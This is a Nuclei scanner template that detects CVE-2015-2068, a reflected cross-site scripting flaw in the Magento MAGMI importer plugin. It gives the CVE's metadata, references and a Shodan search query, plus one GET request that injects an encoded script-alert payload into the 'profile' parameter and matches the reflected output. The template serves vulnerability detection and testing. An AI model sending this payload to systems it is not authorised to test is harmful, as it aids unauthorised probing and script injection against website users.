nuclei-templates/http/cves/2015/CVE-2015-2068.yaml

54 lines
2.2 KiB
YAML

id: CVE-2015-2068
info:
name: Magento Server Mass Importer - Cross-Site Scripting
author: daffainfo
severity: medium
description: Magento Server Mass Importer plugin contains multiple cross-site scripting vulnerabilities which allow remote attackers to inject arbitrary web script or HTML via the (1) profile parameter to web/magmi.php or (2) QUERY_STRING to web/magmi_import_run.php.
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected Magento server.
remediation: |
Apply the latest security patches provided by Magento to fix the XSS vulnerability in the Server Mass Importer module.
reference:
- https://www.exploit-db.com/exploits/35996
- http://packetstormsecurity.com/files/130250/Magento-Server-MAGMI-Cross-Site-Scripting-Local-File-Inclusion.html
- https://nvd.nist.gov/vuln/detail/CVE-2015-2068
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
cvss-score: 4.3
cve-id: CVE-2015-2068
cwe-id: CWE-79
epss-score: 0.00146
epss-percentile: 0.50461
cpe: cpe:2.3:a:magmi_project:magmi:-:*:*:*:*:magento_server:*:*
metadata:
verified: true
max-request: 1
vendor: magmi_project
product: magmi
framework: magento_server
shodan-query: http.component:"Magento"
tags: cve2015,cve,plugin,edb,packetstorm,magento,magmi,xss,magmi_project,magento_server
http:
- method: GET
path:
- '{{BaseURL}}/magmi/web/magmi.php?configstep=2&profile=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 4a0a004730450220694be7145cfc1e6169eb0d365067e365d1af8d913b805e9fb13dd745d779977c0221009298b9cf788df2760dd8ca64a5b3829be18bffed91b756e80af6d3864b68c51a:922c64590222798bb761d5b6d8e72950